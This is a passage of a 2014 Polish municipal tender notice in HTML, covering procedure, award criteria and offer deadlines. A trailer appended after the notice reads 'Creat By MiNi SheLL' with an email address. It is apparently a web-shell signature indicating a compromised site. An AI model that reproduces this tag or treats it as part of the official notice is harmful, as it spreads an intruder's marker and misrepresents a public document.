b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2014 godzina 11:00, miejsce: Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com